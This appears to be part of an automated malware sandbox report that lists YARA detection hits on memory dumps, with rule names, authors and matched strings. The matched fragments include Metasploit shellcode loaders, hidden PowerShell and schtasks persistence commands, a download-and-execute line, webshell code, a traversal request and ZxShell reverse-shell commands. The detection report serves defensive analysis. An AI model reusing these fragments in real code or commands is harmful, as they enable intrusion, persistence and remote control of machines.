- 0x194da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;
- 0x19544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1";
- 0x19590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater"
- 0x195ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file
- 0x1960c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join
- 0x1963c:$x7: $cmdResult = cmd.exe /c $cmdInst | Out-String;
- 0x1966f:$x8: whoami /groups | findstr /c:"S-1-5-32-544"
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | APT_Turla_Agent_BTZ_Gen_1 | Detects Turla Agent.BTZ | Florian Roth | - 0x3a9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0xa82c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0x3b00:$s1: release mutex - %u (%u)(%u)
- 0x3b20:$s2: \system32\win.com
- 0xa9af:$s2: \system32\win.com
- 0x3b36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0x3b6c:$s4: MakeFile Error(%d) copy file to temp file %s
- 0x3b9d:$s5: %s%%s08x.tmp
- 0x3bae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0x3bf0:$s7: Mutex_Log
- 0x3bfe:$s8: %s\system32\winview.ocx
- 0x3c49:$s10: Error: pos(%d) > CmdSize(%d)
- 0x3c6b:$s11: \win.com
- 0x3c79:$s12: Error(%d) run %s
- 0x3c90:$s13: %02d.%02d.%04d Log begin:
- 0xa991:$s13: %02d.%02d.%04d Log begin:
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Suspicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth | - 0x16dc6:$s1: ping 192.0.2.2 -n 1
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Turla_Mal_Script_Jan18_1 | Detects Turla malicious script | Florian Roth | - 0x16fe1:$s1: .charCodeAt(i %
- 0x16ff6:$s2: {WScript.Quit();}
- 0x1700c:$s3: .charAt(i)) << 10) |
- 0x17025:$s4: = WScript.Arguments;var
- 0x17043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | VBS_Obfuscated_Mal_Feb18_1 | Detects malicious obfuscated VBS observed in February 2018 | Florian Roth | - 0x121c2:$x1: A( Array( (1* 2^1 )+
- 0x121db:$x2: .addcode(A( Array(
- 0x121f2:$x3: false:AA.send:Execute(AA.responsetext):end
- 0x12221:$x4: & A( Array( (1* 2^1 )+
- 0x1223d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE(
- 0x1225d:$s2: A = STR:next:end function
- 0x1227b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | LokiBot_Dropper_ScanCopyPDF_Feb18 | Auto-generated rule - file Scan Copy.pdf.com | Florian Roth | - 0x116b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x118a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x11708:$s2: Unstalled2
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0x1a763:$sa1: -enc
- 0x1a7a0:$sb2: -window hidden
- 0x194b3:$sb3: -WindowStyle Hidden
- 0x195ec:$sb3: -windowstyle hidden
- 0x5bcc:$sc1: -nop
- 0x5bd1:$se1: -ep bypass
- 0x195e1:$se1: -ep bypass
- 0x1a756:$se2: -exec bypass
- 0x1a793:$se2: -exec bypass
- 0x13c36:$se3: -ExecutionPolicy Bypass
- 0x1a756:$se4: -exec bypass
- 0x1a793:$se4: -exec bypass
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x18b30:$s1: \umeterpreter\u >
- 0x18b46:$s3: ^meterpreter >
- 0x18b5a:$s11: \umsf\u>
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x18c7a:$x1: resources/covertvpn-injector.exe
- 0x18ca0:$s10: resources/browserpivot.x64.dll
- 0x18cc4:$s17: resources/msfrpcd_new.bat
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Silence_malware_2 | Detects malware sample mentioned in the Silence report on Securelist | Florian Roth | - 0x1dc3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb
- 0x1dc67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}
- 0x1dc9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error
- 0x1dcdf:$s2: \mss.exe
- 0x1dcec:$s3: \out.dat
- 0x1dcf9:$s4: \mss.txt
- 0x1dd06:$s5: Default monitor
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x1d798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth | - 0x1752c:$s1: stratum+tcp://
- 0x1753f:$s2: "normalHashing": true,
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | MAL_unspecified_Jan18_1 | Detects unspecified malware sample | Florian Roth | - 0x16d71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
- 0x16dc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
- 0x16dee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x16e20:$s4: start /b "" cmd /c del "%%~f0"&exit /b
- 0x16e4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x16e74:$s6: %s\%s.bat
- 0x16e82:$s7: DEL /s "%s" >nul 2>&1
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Invoke_PSImage | Detects a command to execute PowerShell from String | Florian Roth | - 0x197f2:$: IEX([System.Text.Encoding]::ASCII.GetString(
- 0x19821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead(
- 0x19855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | malware_apt15_royaldll | DLL implant, originally rights.dll and runs as a service | David Cannings | - 0xd88f:$: Nwsapagent
- 0xd87a:$: "%s">>"%s"\s.txt
- 0xd83a:$: del c:\windows\temp\r.exe /f /q
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_Coinhive | Yara detected Coinhive miner | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_WebMonitor | Yara detected WebMonitor RAT | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_MiniRAT | Yara detected Mini RAT | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_ComRAT_XORKey | Yara detected Turla ComRAT XORKey | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | netwire | detect netwire in memory | JPCERT/CC Incident Response Group | - 0x16dc6:$ping: ping 192.0.2.2
- 0x16dee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
|
0000000A.00000002.536292107.0000000002E75000.00000004.00000040.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x9f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|
0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp | Empire_Invoke_Shellcode | Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 | Florian Roth | - 0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
|
0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0xd88:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0xc08:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0xdc8:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.470556930.0000000006B92000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1db:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x179d0:$a: Amplia Security
|
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x6c99e:$s2: Auditcleaner
- 0x48a7e:$s11: elatedmonkey
- 0x48656:$elf4: charm_saver
- 0x48f76:$elf8: ebbshave
- 0x48d96:$elf9: eggbasket
- 0x6aece:$elf12: envoytomato
- 0x6af2e:$elf14: estopmoonlit
- 0x48a47:$elf17: ghost_sparc
- 0x48eae:$elf18: jackpop
- 0x4abae:$elf19: orleans_stride
- 0x4a76e:$elf21: seconddate
- 0x48656:$pe2: charm_saver
- 0x48a53:$pe3: ghost_x86
|
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x49e90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x4a430:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | |
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x49e90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | - 0x3c35e:$s1: export buf=\
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0x3c497:$s1: & "\" & "svchost.exe"
- 0x3fd9:$s2: CreateObject("Wscript.Shell")
- 0x3c4b1:$s2: CreateObject("Wscript.Shell")
- 0x3d727:$s2: CreateObject("Wscript.Shell")
- 0x3df7f:$s2: CreateObject("Wscript.Shell")
- 0x3c4d3:$s3: <% @language="VBScript" %>
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0x3f66:$s1: powershell.exe -nop -w hidden -e
- 0x3c620:$s1: powershell.exe -nop -w hidden -e
- 0x3cb19:$s1: powershell.exe -nop -w hidden -e
- 0x3c645:$s2: Call Shell(
- 0x3c655:$s3: Sub Workbook_Open()
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0x3cdc7:$s1: '* PAYLOAD DATA
- 0x3cddb:$s2: = Shell(
- 0x3cde9:$s3: = Environ("USERPROFILE")
- 0x3ce06:$s4: '**************************************************************
- 0x3ce4a:$s5: ChDir (
- 0x3ce56:$s6: '* MACRO CODE
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0x3cf90:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x3cfde:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0x3d01b:$s3: .func]::VirtualAlloc(0,
- 0x3d037:$s4: .func+AllocationType]::Reserve -bOr [
- 0x3d061:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0x3d09b:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0x3d0ec:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0x3d131:$s8: .func]::CreateThread(0,0,$
- 0x3d150:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0x3d187:$s10: = [System.Convert]::FromBase64String("/
- 0x3d1b4:$s11: { $global:result = 3; return }
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0x3d300:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x3d329:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0x3d35a:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0x3d395:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0x3d3d4:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0x3d57d:$x1: = new System.Diagnostics.Process();
- 0x3d5a5:$x2: .StartInfo.UseShellExecute = true;
- 0x3d5cc:$x3: , "svchost.exe");
- 0x3d5e2:$s4: = Path.GetTempPath();
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0x3fd7:$s1: = CreateObject("Wscript.Shell")
- 0x3d725:$s1: = CreateObject("Wscript.Shell")
- 0x3df7d:$s1: = CreateObject("Wscript.Shell")
- 0x3ac56:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d749:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df4c:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d77a:$s3: .GetSpecialFolder(2)
- 0x3d793:$s4: .Write Chr(CLng("
- 0x3d7a9:$s5: = "4d5a90000300000004000000ffff00
- 0x3d7cf:$s6: For i = 1 to Len(
- 0x3d7e5:$s7: ) Step 2
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0x3c93f:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x3c987:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0x3c9b8:$s3: = RtlMoveMemory(
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0x3cf90:$s1: [DllImport("kernel32.dll")]
- 0x3d91a:$s1: [DllImport("kernel32.dll")]
- 0x3d93a:$s2: [DllImport("msvcrt.dll")]
- 0x3d958:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0x3d98e:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x3d9b1:$s5: .Length,0x1000),0x3000,0x40)
- 0x3d9d2:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0x3da46:$s7: ::memset([IntPtr]($
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0x3cafb:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0x3db9c:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
- 0x3dbea:$s2: .concat(".exe");
- 0x3dbff:$s3: [0] = "chmod";
- 0x3dc12:$s4: = Runtime.getRuntime().exec(
- 0x3dc33:$s5: , 16) & 0xff;
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0x3df00:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0x3ac56:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d749:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df4c:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df7d:$s3: = CreateObject("Wscript.Shell")
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0x3e0d0:$s1: kernel32.dll WaitForSingleObject),
- 0x3e0f7:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x3e16e:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x3e1d4:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x94e:$s5: = [System.Convert]::FromBase64String(
- 0x3d187:$s5: = [System.Convert]::FromBase64String(
- 0x3e217:$s5: = [System.Convert]::FromBase64String(
- 0x3e241:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0x3e27b:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0xab63:$s1: WS2_32.dll
- 0x9420:$s2: ReflectiveLoader
- 0x9489:$s2: ReflectiveLoader
- 0x98a1:$s2: ReflectiveLoader
- 0x991d:$s2: ReflectiveLoader
- 0xd8b3:$s2: ReflectiveLoader
- 0xd903:$s2: ReflectiveLoader
- 0xe373:$s2: ReflectiveLoader
- 0xe874:$s2: ReflectiveLoader
- 0xeb82:$s2: ReflectiveLoader
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | CVE_2017_8759_SOAP_Excel | Detects malicious files related to CVE-2017-8759 | Florian Roth | |
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x15898:$x1: /\/===\__
- 0x158a6:$x2: ${__/\/==
- 0x158b4:$x3: Catch { }
- 0x158c2:$x4: \_/=} ${_
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0x93d2:$x1: \Release\reflective_dll.pdb
- 0x93f2:$x2: reflective_dll.x64.dll
- 0x940d:$s3: DLL Injection
- 0x941f:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0x9488:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0x9853:$x1: \ReflectiveDLLInjection-master\
- 0x9877:$s2: reflective_dll.dll
- 0x9adb:$s2: reflective_dll.dll
- 0x9b1c:$s2: reflective_dll.dll
- 0x988e:$s3: DLL injection
- 0x98a0:$s4: _ReflectiveLoader@4
- 0x991c:$s4: _ReflectiveLoader@4
- 0xeb81:$s4: _ReflectiveLoader@4
- 0x98b8:$s5: Reflective Dll Injection
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0x9a88:$s1: \Release\inject.pdb
- 0x9aa0:$s2: !!! Failed to gather information on system processes!
- 0x9877:$s3: reflective_dll.dll
- 0x9adb:$s3: reflective_dll.dll
- 0x9b1c:$s3: reflective_dll.dll
- 0x9af2:$s4: [-] %s. Error=%d
- 0x9b07:$s5: \Start Menu\Programs\reflective_dll.dll
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | VBScript_Favicon_File | VBScript cloaked as Favicon file used in Leviathan incident | Florian Roth | - 0x3e1:$x1: myxml = '<?xml version=""1.0"" encoding=""UTF-8""?>';myxml = myxml +'<root>
- 0x431:$x2: .Run "taskkill /im mshta.exe
- 0x452:$x3: <script language="VBScript">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :
- 0x4a5:$s1: .ExpandEnvironmentStrings("%ALLUSERSPROFILE%") &
- 0x4da:$s2: .ExpandEnvironmentStrings("%temp%") &
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Backdoor_Redosdru_Jun17 | Detects malware Redosdru - file systemHome.exe | Florian Roth | - 0x181dc:$x1: %s\%d.gho
- 0x114ac:$x2: %s\nt%s.dll
- 0x181ea:$x2: %s\nt%s.dll
- 0x181fa:$x3: baijinUPdate
- 0x114bc:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x1820b:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x18230:$s2: serviceone
- 0x1823f:$s3: \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#f \x1F#
- 0x182aa:$s4: servicetwo
- 0x182b9:$s5: UpdateCrc
- 0x182c7:$s6: \x1F#[ \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#
- 0x18322:$s7: nwsaPAgEnT
- 0x18331:$s8: %-24s %-15s 0x%x(%d)
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth | - 0x1114a:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x184be:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x1119a:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x1850e:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x18557:$x3: TCPConnectFloodThread.target = %s
- 0x1857d:$s1: \Program Files\Internet Explorer\iexplore.exe
- 0x185af:$s2: %c%c%c%c%c%c.exe
- 0x185c4:$s3: GET %s%s HTTP/1.1
- 0x185da:$s4: CCAttack.target = %s
- 0x11325:$s5: Accept-Language: zh-cn
- 0x185f3:$s5: Accept-Language: zh-cn
- 0x1860e:$s6: jdfwkey
- 0x1861a:$s7: hackqz.f3322.org:8880
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth | - 0x2baf:$s1: .CreateObject("WScript.Shell")
- 0x1a4cf:$s1: .CreateObject("WScript.Shell")
- 0x1a673:$s1: .CreateObject("WScript.Shell")
- 0x3d98:$p1: powershell.exe
- 0x3dbf:$p1: powershell.exe
- 0x3f66:$p1: powershell.exe
- 0x3fa3:$p1: powershell.exe
- 0x5747:$p1: powershell.exe
- 0xd118:$p1: powershell.exe
- 0xd273:$p1: powershell.exe
- 0xd2b1:$p1: powershell.exe
- 0x10376:$p1: powershell.exe
- 0x13456:$p1: powershell.exe
- 0x38dd2:$p1: powershell.exe
- 0x3b7dc:$p1: powershell.exe
- 0x3bc38:$p1: powershell.exe
- 0x3c620:$p1: powershell.exe
- 0x3cb19:$p1: powershell.exe
- 0x3df32:$p1: powershell.exe
- 0x950:$p3: [System.Convert]::FromBase64String(
- 0x3d189:$p3: [System.Convert]::FromBase64String(
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x15f6a:$s1: <hta:application windowstate="minimize"/>
- 0x160fb:$s1: <hta:application windowstate="minimize"/>
- 0x15f98:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | HTA_Embedded | Detects an embedded HTA file | Florian Roth | - 0x15f6a:$s1: <hta:application windowstate="minimize"/>
- 0x160fb:$s1: <hta:application windowstate="minimize"/>
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | StoneDrill | Detects malware from StoneDrill threat report | Florian Roth | - 0x3a987:$s1: Hello dear
- 0x3a996:$s2: WRZRZRAR
- 0x3a9a5:$opa1: 66 89 45 D8 6A 64 FF
- 0x3a9b3:$opa2: 8D 73 01 90 0F BF 51 FE
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | StoneDrill_VBS_1 | Detects malware from StoneDrill threat report | Florian Roth | - 0x3ab38:$x1: wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001" sSubKeyName = "Software\Micros
- 0x3abb6:$x2: ping 1.0.0.0 -n 1 -w 20000 > nul
- 0x3abdb:$s1: WshShell.CopyFile "%COMMON_APPDATA%\Chrome\
- 0x3ac0b:$s2: WshShell.DeleteFile "%temp%\
- 0x3ac2c:$s3: WScript.Sleep(10 * 1000)
- 0x3ac49:$s4: Set WshShell = CreateObject("Scripting.FileSystemObject") While WshShell.FileExists("
- 0x3aca3:$s5: , "%COMMON_APPDATA%\Chrome\
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | ZxShell_Jul17 | Detects a ZxShell - CN threat group | Florian Roth | - 0x1160e:$x1: zxplug -add
- 0x1161e:$x2: getxxx c:\xyz.dll
- 0x11634:$x3: downfile -d c:\windows\update.exe
- 0x1165a:$x4: -fromurl http://x.x.x/x.dll
- 0x1167a:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s
- 0x116aa:$x6: ZXNC -e cmd.exe x.x.x.x
- 0x116c6:$x7: (bind a cmdshell)
- 0x116dc:$x8: ZXFtpServer 21 20 zx
- 0x116f5:$x9: ZXHttpServer
- 0x11707:$x10: c:\error.htm,.exe|c:\a.exe,.zip|c:\b.zip"
- 0x11736:$x11: c:\windows\clipboardlog.txt
